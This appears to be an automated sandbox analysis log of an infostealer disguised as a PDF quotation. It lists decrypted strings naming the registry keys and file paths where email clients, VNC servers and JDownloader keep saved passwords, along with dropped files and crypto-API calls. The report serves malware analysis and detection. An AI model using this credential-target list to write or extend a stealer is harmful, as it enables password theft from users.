                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_user_password>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FTPGetter
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: The Bat!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: appdata
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \The Bat!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Account.CFN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Account.CFN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Becky!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: DataDir
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Folder.lst
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Mailbox.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PassWd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTPServer
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: MailAddress
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Becky!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Outlook
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IMAP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: POP3 Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HTTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IMAP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: POP3 Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HTTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Mail App
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SchemaId
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pResourceElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pIdentityElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pPackageSid
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pAuthenticatorElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: syncpassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: mailoutgoing
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FoxMail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Executable
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FoxmailPath
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Storage\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Storage\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Accounts\Account.rec0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Accounts\Account.rec0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Account.stg
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Account.stg
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: POP3Host
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTPHost
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IncomingServer
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: MailAddress
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: POP3Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Opera Mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: opera:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PocoMail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: appdata
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Pocomail\accounts.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: POPPass
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTPPass
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: eM Client
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: eM Client\accounts.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: eM Client
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: "Username":"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: "Secret":"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: "ProviderName":"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: o6806642kbM7c5
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Mailbird
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SenderIdentities
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Mailbird\Store\Store.db
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Server_Host
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Username
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: EncryptedPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Mailbird
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: RealVNC 4.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: RealVNC 3.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: RealVNC 4.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: RealVNC 3.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\ORL\WinVNC3
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: TightVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\TightVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: TightVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\TightVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PasswordViewOnly
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: TightVNC ControlPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\TightVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ControlPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: TigerVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\TigerVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: JDownloader 2.0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: JDownloader 2.0\cfg
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: JDownloader 2.0\cfg
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,33_2_0040A8C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,33_2_0040C261
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,33_2_0040C3B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,33_2_0040C419
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,33_2_00409D97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,33_2_0040C6BD
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49729 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, 00000021.00000002.472145644.00000000035BB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp
